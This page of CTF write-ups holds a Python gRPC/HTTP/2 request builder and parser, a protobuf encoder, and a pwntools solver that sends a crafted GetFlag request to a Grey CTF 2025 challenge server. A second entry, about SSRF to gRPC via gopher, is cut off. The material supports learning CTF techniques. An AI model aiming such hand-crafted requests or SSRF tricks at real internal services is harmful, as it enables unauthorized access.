My New gRPC Protobuf Parser
| Event Name | Grey CTF 2025 |
| GitHub URL | - |
| Challenge Name | Sgrpc |
Attachments
References
parser.py
from colorama import Fore, Style, init
import hpack
init()  # Initialize colorama once at import time, before any Fore/Style codes are printed
def create_message_data(**kwargs):
    """
    Create a message and populate it from keyword arguments.

    Each keyword becomes an attribute assignment on a freshly constructed
    ``Message`` instance.

    NOTE(review): ``Message`` is not defined or imported in the visible part
    of this file; presumably it is a generated protobuf class -- confirm.

    Args:
        **kwargs: Field name -> value pairs to set on the message.
    Returns:
        The populated message object.
    """
    message = Message()
    for key, value in kwargs.items():
        setattr(message, key, value)
    # The original built the message and then dropped it (implicit None).
    return message
def create_grpc_http2_request(request_proto, service_name: str, method_name: str) -> bytes:
    """
    Construct raw bytes for a single-shot gRPC request including HTTP/2 framing.

    The result is: connection preface, an empty SETTINGS frame, a SETTINGS
    ACK, one HEADERS frame and one DATA frame (both on stream 1).

    Args:
        request_proto: Either the already-serialized protobuf message
            (bytes-like), or an object exposing ``SerializeToString()``.
        service_name: The name of the gRPC service
        method_name: The name of the gRPC method
    Returns:
        bytes: The complete raw HTTP/2 + gRPC request
    """
    # Accept pre-serialized bytes as well as message objects so that both
    # hand-rolled encoders and generated protobuf classes can be used.
    if isinstance(request_proto, (bytes, bytearray, memoryview)):
        message_data = bytes(request_proto)
    else:
        message_data = request_proto.SerializeToString()

    # HTTP/2 connection preface ("PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n")
    http2_preface = bytes.fromhex("505249202a20485454502f322e300d0a0d0a534d0d0a0d0a")
    # HTTP/2 SETTINGS frame (empty payload, stream 0)
    settings_frame = bytes.fromhex("000000040000000000")
    # HTTP/2 SETTINGS frame with ACK flag; sent up front because the whole
    # request is written in one go without reading the peer's SETTINGS.
    settings_ack = bytes.fromhex("000000040100000000")

    # HEADERS frame: 3-byte length, type 0x01, flags 0x04 (END_HEADERS), stream 1
    encoded_headers = encode_grpc_http2_headers(service_name, method_name)
    headers_length = len(encoded_headers).to_bytes(3, byteorder='big')
    headers_frame = headers_length + bytes.fromhex("010400000001") + encoded_headers

    # gRPC message framing: 1-byte compressed flag + 4-byte big-endian length
    grpc_header = bytes([0]) + len(message_data).to_bytes(4, byteorder='big')

    # DATA frame header: type 0x00, flags 0x01 (END_STREAM), stream 1
    data_length = (len(grpc_header) + len(message_data)).to_bytes(3, byteorder='big')
    data_frame_header = data_length + bytes.fromhex("000100000001")

    return b"".join((
        http2_preface,
        settings_frame,
        settings_ack,
        headers_frame,
        data_frame_header,
        grpc_header,
        message_data,
    ))
def encode_grpc_http2_headers(service_name, method_name):
    """HPACK-encode the request headers for a gRPC call to service/method."""
    request_path = f'/{service_name}/{method_name}'
    header_fields = [
        (':method', 'POST'),
        (':scheme', 'http'),
        (':path', request_path),
        ('content-type', 'application/grpc'),
    ]
    # A fresh encoder per call: every request starts with an empty dynamic table.
    return hpack.Encoder().encode(header_fields)
def decode_hpack_headers(encoded_headers):
    """
    Decompress an HPACK header block into header tuples.

    Args:
        encoded_headers: HPACK-encoded header block
    Returns:
        The decoded (name, value) headers, or an empty list when decoding
        fails (the error is printed, not raised).
    """
    import hpack

    hpack_decoder = hpack.Decoder()
    try:
        decoded = hpack_decoder.decode(encoded_headers)
    except Exception as e:
        print(f"Error decoding headers: {e}")
        return []
    return decoded
def get_http2_frame_type_name(type_id):
    """Translate a numeric HTTP/2 frame type into its name ("UNKNOWN" if unmapped)."""
    # Names are listed in frame-type order, so the index is the type id.
    ordered_names = (
        "DATA",
        "HEADERS",
        "PRIORITY",
        "RST_STREAM",
        "SETTINGS",
        "PUSH_PROMISE",
        "PING",
        "GOAWAY",
        "WINDOW_UPDATE",
        "CONTINUATION",
    )
    name_by_id = dict(enumerate(ordered_names))
    return name_by_id.get(type_id, "UNKNOWN")
def parse_grpc_response(raw_response, verbose=False, color=True):
    """
    Decode the HTTP/2 frames of a raw gRPC response.

    Walks the byte string frame by frame, decodes DATA frames as
    length-prefixed gRPC messages, reassembles HEADERS/CONTINUATION header
    blocks per stream, and extracts ``grpc-status`` / ``grpc-message`` from
    trailers.

    Args:
        raw_response: Raw HTTP/2 response bytes
        verbose: If True, print detailed analysis information
        color: If True, use colors in output
    Returns:
        Dictionary with keys ``frames``, ``headers``, ``trailers``,
        ``messages`` and ``errors``; ``grpc_status`` is added when the
        trailers carry a status or message.
    """
    # Color settings (empty strings disable coloring)
    C_FRAME = Fore.BLUE if color else ""
    C_HEADER = Fore.GREEN if color else ""
    C_DATA = Fore.CYAN if color else ""
    C_ERROR = Fore.RED if color else ""
    C_SUCCESS = Fore.GREEN if color else ""
    C_RESET = Style.RESET_ALL if color else ""

    if verbose:
        print(f"Response length: {len(raw_response)}")

    result = {
        'frames': [],
        'headers': {},
        'trailers': {},
        'messages': [],
        'errors': []
    }

    header_blocks = {}  # Map stream_id -> accumulated header block
    is_trailer = {}  # Map stream_id -> boolean (if this is a trailer block)

    def complete_header_block(sid, info, heading, failure):
        """Decode the accumulated block for *sid* and file it as headers or trailers."""
        # Decode the WHOLE accumulated block, not just the last fragment, and
        # store the outcome regardless of verbosity.
        headers = decode_hpack_headers(bytes(header_blocks.pop(sid)))
        info['decoded_headers'] = headers
        if headers:
            if verbose:
                print(f" {C_HEADER}{heading}:{C_RESET}")
                for name, value in headers:
                    print(f" {C_HEADER}{name}:{C_RESET} {value}")
            destination = 'trailers' if is_trailer[sid] else 'headers'
            result[destination][sid] = headers
        elif verbose:
            print(f" {C_ERROR}{failure}{C_RESET}")

    # Process HTTP/2 frames
    pos = 0
    current_stream_id = None
    total = len(raw_response)
    while pos < total:
        # Ensure we have enough bytes for a frame header
        if pos + 9 > total:
            error_msg = f"Incomplete frame header at position {pos}"
            result['errors'].append(error_msg)
            if verbose:
                print(f"{C_ERROR}{error_msg}{C_RESET}")
            break

        # Parse frame header: 3-byte length, type, flags, 31-bit stream id
        length = int.from_bytes(raw_response[pos:pos+3], byteorder='big')
        frame_type = raw_response[pos+3]
        flags = raw_response[pos+4]
        stream_id = int.from_bytes(raw_response[pos+5:pos+9], byteorder='big') & 0x7FFFFFFF
        end_headers = (flags & 0x04) != 0  # END_HEADERS flag
        end_stream = (flags & 0x01) != 0  # END_STREAM flag
        frame_info = {
            'position': pos,
            'length': length,
            'type': frame_type,
            'type_name': get_http2_frame_type_name(frame_type),
            'flags': flags,
            'stream_id': stream_id,
            'end_headers': end_headers,
            'end_stream': end_stream
        }
        if verbose:
            print(f"\n{C_FRAME}Frame at position {pos}:{C_RESET}")
            print(f" {C_FRAME}Type:{C_RESET} {get_http2_frame_type_name(frame_type)} ({frame_type})")
            print(f" {C_FRAME}Length:{C_RESET} {length}")
            print(f" {C_FRAME}Flags:{C_RESET} {flags:08b} (END_HEADERS: {end_headers}, END_STREAM: {end_stream})")
            print(f" {C_FRAME}Stream ID:{C_RESET} {stream_id}")
        pos += 9  # Move past frame header

        # Process frame payload
        if pos + length > total:
            error_msg = f"Incomplete frame payload (need {length} bytes, have {total - pos})"
            frame_info['error'] = error_msg
            result['errors'].append(error_msg)
            result['frames'].append(frame_info)
            if verbose:
                print(f" {C_ERROR}{error_msg}{C_RESET}")
            break
        frame_payload = raw_response[pos:pos+length]

        # Handle different frame types
        if frame_type == 0:  # DATA frame
            if verbose:
                print(f" {C_DATA}DATA frame payload:{C_RESET}")
            message_result = decode_grpc_data_frame_payload(
                frame_payload,
                message_types=[],  # Add more message types as needed
                verbose=verbose,
                color=color
            )
            frame_info.update({
                'grpc_message': message_result
            })
            # If we successfully parsed a message, add it to results
            if message_result['valid'] and 'parsed' in message_result:
                result['messages'].append(message_result['parsed'])
        elif frame_type == 1:  # HEADERS frame
            if verbose:
                print(f" {C_HEADER}HEADERS frame payload:{C_RESET}")
            # Start collecting header block for this stream
            if stream_id not in header_blocks:
                header_blocks[stream_id] = bytearray()
                is_trailer[stream_id] = end_stream  # Headers at the end of stream are trailers
            header_blocks[stream_id].extend(frame_payload)
            if end_headers:
                complete_header_block(
                    stream_id, frame_info,
                    "Decoded headers", "Failed to decode headers",
                )
            else:
                current_stream_id = stream_id  # Remember for CONTINUATION frames
        elif frame_type == 9 and stream_id == current_stream_id:  # CONTINUATION frame
            if verbose:
                print(f" {C_HEADER}CONTINUATION frame payload{C_RESET}")
            if stream_id in header_blocks:
                header_blocks[stream_id].extend(frame_payload)
                if end_headers:
                    complete_header_block(
                        stream_id, frame_info,
                        "Decoded continuation headers",
                        "Failed to decode continuation headers",
                    )
                    current_stream_id = None
        # Process error frames (GOAWAY, RST_STREAM) only in verbose mode
        elif verbose:
            if frame_type == 7:  # GOAWAY frame
                if len(frame_payload) >= 8:
                    last_stream_id = int.from_bytes(frame_payload[0:4], byteorder='big') & 0x7FFFFFFF
                    error_code = int.from_bytes(frame_payload[4:8], byteorder='big')
                    print(f" {C_ERROR}GOAWAY:{C_RESET} Last Stream ID={last_stream_id}, Error={get_http2_error_name(error_code)}")
            elif frame_type == 3:  # RST_STREAM frame
                if len(frame_payload) == 4:
                    error_code = int.from_bytes(frame_payload, byteorder='big')
                    print(f" {C_ERROR}RST_STREAM:{C_RESET} Error={get_http2_error_name(error_code)}")
            else:
                # Build the text first so the "Payload:" prefix is always
                # printed (the original conditional dropped it for short payloads).
                payload_hex = frame_payload.hex()
                if len(frame_payload) > 30:
                    payload_hex = payload_hex[:30] + "..."
                print(f" Payload: {payload_hex}")

        result['frames'].append(frame_info)
        pos += length  # Move to next frame

    # Extract gRPC status from trailers
    for stream_id, trailers in result['trailers'].items():
        for name, value in trailers:
            if name == 'grpc-status':
                try:
                    status_code = int(value)
                except (TypeError, ValueError):
                    error_msg = f"Invalid grpc-status value: {value!r}"
                    result['errors'].append(error_msg)
                    if verbose:
                        print(f"{C_ERROR}{error_msg}{C_RESET}")
                    continue
                # Merge instead of overwrite so an earlier grpc-message survives.
                result.setdefault('grpc_status', {}).update({
                    'code': status_code,
                    'name': get_grpc_status_name(status_code)
                })
                if verbose:
                    status_color = C_SUCCESS if status_code == 0 else C_ERROR
                    print(f"\n{status_color}gRPC Status: {status_code} ({get_grpc_status_name(status_code)}){C_RESET}")
            elif name == 'grpc-message':
                result.setdefault('grpc_status', {})['message'] = value
                if verbose:
                    print(f"{C_ERROR}gRPC Message: {value}{C_RESET}")

    # Final summary only in verbose mode
    if verbose:
        print(f"\n{C_FRAME}=== SUMMARY ==={C_RESET}")
        print(f"Total frames: {len(result['frames'])}")
        print(f"Headers: {len(result['headers'])} streams")
        print(f"Trailers: {len(result['trailers'])} streams")
        print(f"Decoded messages: {len(result['messages'])}")
        print(f"Errors: {len(result['errors'])}")

    # For cleaner non-verbose output, just print the first message if found
    if result['messages'] and not verbose:
        msg = result['messages'][0]
        # Parsed entries carry 'type', 'message' and 'text' (there is no 'parsed' key).
        print(f"{C_SUCCESS}Decoded {msg['type']}:{C_RESET} {msg['text']}")
    return result
def get_http2_error_name(code):
    """Translate a numeric HTTP/2 error code into its symbolic name."""
    # Listed in error-code order, so the index is the code.
    ordered_names = (
        "NO_ERROR",
        "PROTOCOL_ERROR",
        "INTERNAL_ERROR",
        "FLOW_CONTROL_ERROR",
        "SETTINGS_TIMEOUT",
        "STREAM_CLOSED",
        "FRAME_SIZE_ERROR",
        "REFUSED_STREAM",
        "CANCEL",
        "COMPRESSION_ERROR",
        "CONNECT_ERROR",
        "ENHANCE_YOUR_CALM",
        "INADEQUATE_SECURITY",
        "HTTP_1_1_REQUIRED",
    )
    name_by_code = dict(enumerate(ordered_names))
    if code in name_by_code:
        return name_by_code[code]
    return f"UNKNOWN_ERROR_{code}"
def get_grpc_status_name(code):
    """Translate a numeric gRPC status code into its symbolic name."""
    # Listed in status-code order, so the index is the code.
    ordered_names = (
        "OK",
        "CANCELLED",
        "UNKNOWN",
        "INVALID_ARGUMENT",
        "DEADLINE_EXCEEDED",
        "NOT_FOUND",
        "ALREADY_EXISTS",
        "PERMISSION_DENIED",
        "RESOURCE_EXHAUSTED",
        "FAILED_PRECONDITION",
        "ABORTED",
        "OUT_OF_RANGE",
        "UNIMPLEMENTED",
        "INTERNAL",
        "UNAVAILABLE",
        "DATA_LOSS",
        "UNAUTHENTICATED",
    )
    name_by_code = dict(enumerate(ordered_names))
    if code in name_by_code:
        return name_by_code[code]
    return f"UNKNOWN_STATUS_{code}"
def parse_grpc_request(raw_request, verbose=False, color=True):
    """
    Decode a raw gRPC HTTP/2 request and extract the relevant information.

    Checks for the HTTP/2 connection preface, then walks the frames:
    DATA frames are decoded as length-prefixed gRPC messages and
    HEADERS/CONTINUATION header blocks are reassembled per stream. The
    ``:path`` header, when present, is split into service and method.

    Args:
        raw_request: Raw HTTP/2 request bytes
        verbose: If True, print detailed analysis information
        color: If True, use colors in output
    Returns:
        Dictionary with keys ``preface``, ``frames``, ``headers``,
        ``messages`` and ``errors``; ``service`` and ``method`` are added
        when a ``:path`` of the form ``/service/method`` is found.
    """
    # Color settings (empty strings disable coloring)
    C_FRAME = Fore.BLUE if color else ""
    C_HEADER = Fore.GREEN if color else ""
    C_DATA = Fore.CYAN if color else ""
    C_ERROR = Fore.RED if color else ""
    C_SUCCESS = Fore.GREEN if color else ""
    C_RESET = Style.RESET_ALL if color else ""

    if verbose:
        print(f"Request length: {len(raw_request)}")

    result = {
        'preface': None,
        'frames': [],
        'headers': {},
        'messages': [],
        'errors': []
    }

    # Look for HTTP/2 connection preface ("PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n")
    http2_preface = bytes.fromhex("505249202a20485454502f322e300d0a0d0a534d0d0a0d0a")
    pos = 0
    if raw_request.startswith(http2_preface):
        result['preface'] = {
            'position': 0,
            'length': len(http2_preface),
            'valid': True
        }
        if verbose:
            print(f"{C_SUCCESS}Found valid HTTP/2 connection preface{C_RESET}")
        pos = len(http2_preface)
    else:
        # Without a preface, frames are parsed from offset 0.
        result['preface'] = {
            'position': 0,
            'valid': False
        }
        if verbose:
            print(f"{C_ERROR}HTTP/2 connection preface not found{C_RESET}")

    header_blocks = {}  # Map stream_id -> accumulated header block

    def complete_header_block(sid, info, heading, failure):
        """Decode the accumulated block for *sid*, store it and extract service/method."""
        headers = decode_hpack_headers(bytes(header_blocks.pop(sid)))
        info['decoded_headers'] = headers
        if not headers:
            if verbose:
                print(f" {C_ERROR}{failure}{C_RESET}")
            return
        if verbose:
            print(f" {C_HEADER}{heading}:{C_RESET}")
            for name, value in headers:
                print(f" {C_HEADER}{name}:{C_RESET} {value}")
        # Stored regardless of verbosity, for HEADERS and CONTINUATION alike.
        result['headers'][sid] = headers
        # Extract service and method from the first :path header, if present
        path = next((value for name, value in headers if name == ':path'), None)
        if path and path.startswith('/'):
            parts = path[1:].split('/')
            if len(parts) >= 2:
                result['service'] = parts[0]
                result['method'] = parts[1]
                if verbose:
                    print(f" {C_SUCCESS}Identified service:{C_RESET} {parts[0]}")
                    print(f" {C_SUCCESS}Identified method:{C_RESET} {parts[1]}")

    # Process HTTP/2 frames
    current_stream_id = None
    total = len(raw_request)
    while pos < total:
        # Ensure we have enough bytes for a frame header
        if pos + 9 > total:
            error_msg = f"Incomplete frame header at position {pos}"
            result['errors'].append(error_msg)
            if verbose:
                print(f"{C_ERROR}{error_msg}{C_RESET}")
            break

        # Parse frame header: 3-byte length, type, flags, 31-bit stream id
        length = int.from_bytes(raw_request[pos:pos+3], byteorder='big')
        frame_type = raw_request[pos+3]
        flags = raw_request[pos+4]
        stream_id = int.from_bytes(raw_request[pos+5:pos+9], byteorder='big') & 0x7FFFFFFF
        end_headers = (flags & 0x04) != 0  # END_HEADERS flag
        end_stream = (flags & 0x01) != 0  # END_STREAM flag
        frame_info = {
            'position': pos,
            'length': length,
            'type': frame_type,
            'type_name': get_http2_frame_type_name(frame_type),
            'flags': flags,
            'stream_id': stream_id,
            'end_headers': end_headers,
            'end_stream': end_stream
        }
        if verbose:
            print(f"\n{C_FRAME}Frame at position {pos}:{C_RESET}")
            print(f" {C_FRAME}Type:{C_RESET} {get_http2_frame_type_name(frame_type)} ({frame_type})")
            print(f" {C_FRAME}Length:{C_RESET} {length}")
            print(f" {C_FRAME}Flags:{C_RESET} {flags:08b} (END_HEADERS: {end_headers}, END_STREAM: {end_stream})")
            print(f" {C_FRAME}Stream ID:{C_RESET} {stream_id}")
        pos += 9  # Move past frame header

        # Process frame payload
        if pos + length > total:
            error_msg = f"Incomplete frame payload (need {length} bytes, have {total - pos})"
            frame_info['error'] = error_msg
            result['errors'].append(error_msg)
            result['frames'].append(frame_info)
            if verbose:
                print(f" {C_ERROR}{error_msg}{C_RESET}")
            break
        frame_payload = raw_request[pos:pos+length]

        # Handle different frame types
        if frame_type == 0:  # DATA frame
            if verbose:
                print(f" {C_DATA}DATA frame payload:{C_RESET}")
            # No message types are passed since the request type is unknown
            message_result = decode_grpc_data_frame_payload(
                frame_payload,
                verbose=verbose,
                color=color
            )
            frame_info.update({
                'grpc_message': message_result
            })
            # Only record messages whose body was actually extracted; a
            # truncated message has no 'message_data' entry.
            if message_result['valid'] and 'message_data' in message_result:
                result['messages'].append({
                    'length': message_result['message_length'],
                    'compressed': message_result['compressed'],
                    'raw_data': message_result['message_data'],
                    'hex_data': message_result['hex_data']
                })
        elif frame_type == 1:  # HEADERS frame
            if verbose:
                print(f" {C_HEADER}HEADERS frame payload:{C_RESET}")
            # Start collecting header block for this stream
            if stream_id not in header_blocks:
                header_blocks[stream_id] = bytearray()
            header_blocks[stream_id].extend(frame_payload)
            if end_headers:
                complete_header_block(
                    stream_id, frame_info,
                    "Decoded headers", "Failed to decode headers",
                )
            else:
                current_stream_id = stream_id  # Remember for CONTINUATION frames
        elif frame_type == 9 and stream_id == current_stream_id:  # CONTINUATION frame
            if verbose:
                print(f" {C_HEADER}CONTINUATION frame payload{C_RESET}")
            if stream_id in header_blocks:
                header_blocks[stream_id].extend(frame_payload)
                if end_headers:
                    complete_header_block(
                        stream_id, frame_info,
                        "Decoded continuation headers",
                        "Failed to decode continuation headers",
                    )
                    current_stream_id = None
        # Process other frame types (only in verbose mode)
        elif verbose and frame_type == 4:  # SETTINGS frame
            print(f" {C_FRAME}SETTINGS frame{C_RESET}")
            # Settings are pairs of 16-bit identifiers and 32-bit values
            settings = []
            for i in range(0, len(frame_payload) - 5, 6):
                identifier = int.from_bytes(frame_payload[i:i+2], byteorder='big')
                value = int.from_bytes(frame_payload[i+2:i+6], byteorder='big')
                setting_name = get_http2_setting_name(identifier)
                settings.append((identifier, setting_name, value))
                print(f" {C_FRAME}Setting:{C_RESET} {setting_name} ({identifier}) = {value}")
            frame_info['settings'] = settings
        elif verbose:
            # Build the text first so the "Payload:" prefix is always printed
            # (the original conditional dropped it for short payloads).
            payload_hex = frame_payload.hex()
            if len(frame_payload) > 30:
                payload_hex = payload_hex[:30] + "..."
            print(f" Payload: {payload_hex}")

        result['frames'].append(frame_info)
        pos += length  # Move to next frame

    # Final summary only in verbose mode
    if verbose:
        print(f"\n{C_FRAME}=== SUMMARY ==={C_RESET}")
        print(f"Total frames: {len(result['frames'])}")
        print(f"Headers: {len(result['headers'])} streams")
        print(f"Messages: {len(result['messages'])}")
        print(f"Errors: {len(result['errors'])}")
        if 'service' in result and 'method' in result:
            print(f"Service: {result['service']}")
            print(f"Method: {result['method']}")

    # For cleaner non-verbose output, just print basic info
    if not verbose:
        if 'service' in result and 'method' in result:
            print(f"{C_SUCCESS}Request for {result['service']}/{result['method']}{C_RESET}")
        print(f"Frames: {len(result['frames'])}, Messages: {len(result['messages'])}")
    return result
def get_http2_setting_name(identifier):
    """Translate an HTTP/2 SETTINGS identifier into its symbolic name."""
    known_settings = (
        (0x1, "HEADER_TABLE_SIZE"),
        (0x2, "ENABLE_PUSH"),
        (0x3, "MAX_CONCURRENT_STREAMS"),
        (0x4, "INITIAL_WINDOW_SIZE"),
        (0x5, "MAX_FRAME_SIZE"),
        (0x6, "MAX_HEADER_LIST_SIZE"),
        (0x8, "ENABLE_CONNECT_PROTOCOL"),
    )
    name_by_id = dict(known_settings)
    if identifier in name_by_id:
        return name_by_id[identifier]
    return f"UNKNOWN_{identifier}"
def decode_grpc_data_frame_payload(frame_payload, message_types=None, verbose=False, color=True):
    """
    Decode a gRPC DATA frame payload containing one length-prefixed message.

    The payload is expected to start with a 1-byte compressed flag and a
    4-byte big-endian message length, followed by the message bytes.

    Args:
        frame_payload: Raw bytes of the DATA frame payload
        message_types: List of protobuf message types to try parsing with (optional)
        verbose: If True, print detailed analysis information
        color: If True, use colors in output
    Returns:
        Dictionary describing the message. ``valid`` is True only when the
        complete message body was extracted; in that case ``compressed``,
        ``message_length``, ``message_data`` and ``hex_data`` are present,
        plus ``parsed`` (first message type that parsed) and
        ``remaining_bytes`` (trailing bytes after the message) when
        applicable. On failure ``error`` holds a description.
    """
    # Color settings (empty strings disable coloring)
    C_DATA = Fore.CYAN if color else ""
    C_ERROR = Fore.RED if color else ""
    C_SUCCESS = Fore.GREEN if color else ""
    C_RESET = Style.RESET_ALL if color else ""

    result = {
        'valid': False,
        'error': None
    }

    # Check if we have enough bytes for gRPC message header (1 byte compressed flag + 4 bytes length)
    if len(frame_payload) < 5:
        result['error'] = f"Incomplete gRPC message header (need 5 bytes, have {len(frame_payload)})"
        if verbose:
            print(f" {C_ERROR}{result['error']}{C_RESET}")
        return result

    # Extract gRPC message framing
    compressed = frame_payload[0]
    message_length = int.from_bytes(frame_payload[1:5], byteorder='big')
    result.update({
        'valid': True,
        'compressed': compressed,
        'message_length': message_length,
    })
    if verbose:
        print(f" {C_DATA}gRPC message framing:{C_RESET}")
        print(f" Compressed: {compressed}")
        print(f" Message length: {message_length} bytes")

    # Check if we have the complete message
    if len(frame_payload) < 5 + message_length:
        # A truncated body is not a usable message: callers that see
        # valid=True go on to read 'message_data', which is absent here.
        result['valid'] = False
        result['error'] = f"Incomplete message data (need {message_length} bytes, have {len(frame_payload) - 5})"
        if verbose:
            print(f" {C_ERROR}{result['error']}{C_RESET}")
        return result

    # Extract the message data
    message_data = frame_payload[5:5+message_length]
    hex_data = message_data.hex()
    result['message_data'] = message_data
    result['hex_data'] = hex_data

    if verbose:
        print(f" {C_DATA}Message data (hex):{C_RESET}")
        if len(hex_data) > 100:
            # Show at most five 64-character rows (160 bytes) and report the
            # hidden remainder in bytes, i.e. two hex characters each.
            preview = hex_data[:320]
            formatted_hex = "\n ".join(
                preview[i:i+64] for i in range(0, len(preview), 64)
            )
            hidden_bytes = (len(hex_data) - len(preview)) // 2
            if hidden_bytes:
                formatted_hex += f"\n ... ({hidden_bytes} more bytes)"
            print(f" {formatted_hex}")
        else:
            print(f" {hex_data}")

    # Try to parse with provided message types; the first success wins
    for msg_type in message_types or ():
        try:
            message = msg_type()
            message.ParseFromString(message_data)
            text = str(message)
            result['parsed'] = {
                'type': msg_type.__name__,
                'message': message,
                'text': text
            }
            if verbose:
                print(f" {C_SUCCESS}Parsed as {msg_type.__name__}:{C_RESET}")
                # Indent outside the f-string: a backslash inside an f-string
                # expression is a SyntaxError before Python 3.12.
                indented = text.replace('\n', '\n ')
                print(f" {indented}")
            break
        except Exception as e:
            if verbose:
                print(f" {C_ERROR}Failed to parse as {msg_type.__name__}: {e}{C_RESET}")

    # If there's remaining data in the frame payload, note it
    if len(frame_payload) > 5 + message_length:
        remaining = len(frame_payload) - (5 + message_length)
        result['remaining_bytes'] = remaining
        if verbose:
            print(f" {C_DATA}Note: {remaining} bytes remaining after message{C_RESET}")
    return result
import struct
from typing import Iterable
# Wire-type constants -------------------------------------------------------
VARINT = 0  # int32, int64, uint32, uint64, sint32, sint64, bool, enum
I64 = 1  # fixed64, sfixed64, double
LEN = 2  # length-delimited: string, bytes, sub-messages, packed fields
SGROUP = 3  # start-group (deprecated)
EGROUP = 4  # end-group (deprecated)
I32 = 5  # fixed32, sfixed32, float


class ProtobufEncoder:
    """Incrementally builds a protobuf message in wire format.

    Each ``add_*`` method appends one field (tag + payload) to an internal
    buffer; ``to_bytes()`` returns everything written so far.
    """

    def __init__(self) -> None:
        self._buf = bytearray()

    # --- Low-level helpers --------------------------------------------------
    @staticmethod
    def _encode_varint(val: int) -> bytes:
        """Encodes *val* as an unsigned varint (little-endian 7-bit chunks)."""
        # Negative numbers are treated as two's-complement on the wire; we
        # just cast them into 64-bit unsigned space.
        if val < 0:
            val &= (1 << 64) - 1
        out = bytearray()
        while True:
            to_write = val & 0x7F
            val >>= 7
            if val:
                # More chunks follow: set the continuation bit.
                out.append(to_write | 0x80)
            else:
                out.append(to_write)
                break
        return bytes(out)

    @staticmethod
    def _encode_zigzag(val: int, bits: int = 64) -> int:
        """Applies ZigZag transform (for sint* types)."""
        return (val << 1) ^ (val >> (bits - 1))

    @classmethod
    def _tag(cls, field_no: int, wire_type: int) -> bytes:
        """Returns the varint tag for *field_no* / *wire_type*."""
        return cls._encode_varint((field_no << 3) | wire_type)

    # --- Public field writers ---------------------------------------------
    def add_varint(self, field_no: int, val: int) -> None:
        """Writes an *int* / *uint* / *bool* / *enum* value."""
        self._buf += self._tag(field_no, VARINT)
        self._buf += self._encode_varint(val)

    def add_sint(self, field_no: int, val: int, bits: int = 64) -> None:
        """Writes a ZigZag-encoded *sint32* / *sint64*."""
        self.add_varint(field_no, self._encode_zigzag(val, bits))

    def add_fixed32(self, field_no: int, val: int) -> None:
        """Writes *val* as a little-endian 32-bit value (truncated to 32 bits)."""
        self._buf += self._tag(field_no, I32)
        self._buf += struct.pack('<I', val & 0xFFFFFFFF)

    def add_fixed64(self, field_no: int, val: int) -> None:
        """Writes *val* as a little-endian 64-bit value (truncated to 64 bits)."""
        self._buf += self._tag(field_no, I64)
        self._buf += struct.pack('<Q', val & 0xFFFFFFFFFFFFFFFF)

    def add_float(self, field_no: int, val: float) -> None:
        """Writes *val* as a little-endian 32-bit float."""
        self._buf += self._tag(field_no, I32)
        self._buf += struct.pack('<f', val)

    def add_double(self, field_no: int, val: float) -> None:
        """Writes *val* as a little-endian 64-bit float."""
        self._buf += self._tag(field_no, I64)
        self._buf += struct.pack('<d', val)

    def add_bytes(self, field_no: int, data: bytes) -> None:
        """Writes a length-delimited field: tag, varint length, raw bytes."""
        self._buf += self._tag(field_no, LEN)
        self._buf += self._encode_varint(len(data))
        self._buf += data

    def add_string(self, field_no: int, text: str) -> None:
        """Writes *text* as a UTF-8 encoded length-delimited field."""
        # Plain ASCII codec name; the original literal contained a
        # non-breaking hyphen (U+2011) instead of "-".
        self.add_bytes(field_no, text.encode("utf-8"))

    def add_message(self, field_no: int, msg: "ProtobufEncoder") -> None:
        """Embeds another encoder's output as a length-delimited sub-message."""
        encoded = msg.to_bytes()
        self.add_bytes(field_no, encoded)

    # --- Packed repeated helpers ------------------------------------------
    def add_packed_varints(self, field_no: int, vals: Iterable[int]) -> None:
        """Writes *vals* as one packed (length-delimited) run of varints."""
        chunk = b"".join(self._encode_varint(v) for v in vals)
        self.add_bytes(field_no, chunk)

    # --- Output ------------------------------------------------------------
    def to_bytes(self) -> bytes:  # pragma: no cover
        """Returns the encoded message as *bytes*."""
        return bytes(self._buf)

    def hex(self, sep: str = "") -> str:  # pragma: no cover
        """Hex-encode the message (shortcut for quick inspection).

        *sep*, when non-empty, is inserted between bytes.
        """
        data = self.to_bytes()
        # bytes.hex() rejects an empty separator, so only forward a real one.
        return data.hex(sep) if sep else data.hex()

    # --- Convenience dunder -----------------------------------------------
    def __bytes__(self) -> bytes:  # pragma: no cover
        return self.to_bytes()

    def __repr__(self) -> str:  # pragma: no cover
        return f"<ProtobufEncoder {self.hex()}>"
solver.py
import asyncio
from pwn import *
import parser
async def main():
    """Build the GetFlag request, send it to the challenge server and print the reply."""
    encoder = parser.ProtobufEncoder()
    # Field 1 -- "last condition" (per the original notes)
    encoder.add_fixed64(1, 3141592654)
    # Field 2 -- "first condition"
    encoder.add_string(2, "TraLaLeRo TraLaLa")
    # Field 3 -- "second condition"
    encoder.add_bytes(3, b"cafebabe")
    # Not sent: encoder.add_string(4, "flag.Flag.Hello")
    request_body = encoder.to_bytes()

    # Alternative target noted during the challenge (not used):
    #   service "grpc.reflection.v1.ServerReflection", method "ServerReflectionInfo"
    payload = parser.create_grpc_http2_request(request_body, "flag.Flag", "GetFlag")
    print(payload)

    # The whole request goes out in a single write; the reply is collected
    # until the peer closes or the 2 second timeout passes.
    r = remote("challs.nusgreyhats.org", 33202)
    r.send(payload)
    res = r.recvall(timeout=2)
    print(parser.parse_grpc_response(res))
    r.interactive()


if __name__ == "__main__":
    asyncio.run(main())
SSRF to gRPC via gopher protocol
| Event Name | Cyber Apocalypse CTF 2025: Tales from Eldoria After Party |
| GitHub URL | - |
| Challenge Name | Eldoria Realms |
Attachments
References
parser.py
from colorama import Fore, Style, init
import hpack
from challenge.live_data_pb2 import HealthCheckResponse
init()  # Initialize colorama once at import time, before any Fore/Style codes are printed
def create_grpc_http2_request(request_proto, service_name: str, method_name: str) -> bytes:
    """
    Construct raw bytes for a single-shot gRPC request including HTTP/2 framing.

    The result is: connection preface, an empty SETTINGS frame, a SETTINGS
    ACK, one HEADERS frame and one DATA frame (both on stream 1).

    Args:
        request_proto: Either an object exposing ``SerializeToString()``
            (e.g. a protobuf message), or the already-serialized message
            as a bytes-like object.
        service_name: The name of the gRPC service
        method_name: The name of the gRPC method
    Returns:
        bytes: The complete raw HTTP/2 + gRPC request
    """
    # The signature used to advertise ``bytes`` while the body required a
    # message object; both forms are accepted now.
    if isinstance(request_proto, (bytes, bytearray, memoryview)):
        message_data = bytes(request_proto)
    else:
        message_data = request_proto.SerializeToString()

    # HTTP/2 connection preface ("PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n")
    http2_preface = bytes.fromhex("505249202a20485454502f322e300d0a0d0a534d0d0a0d0a")
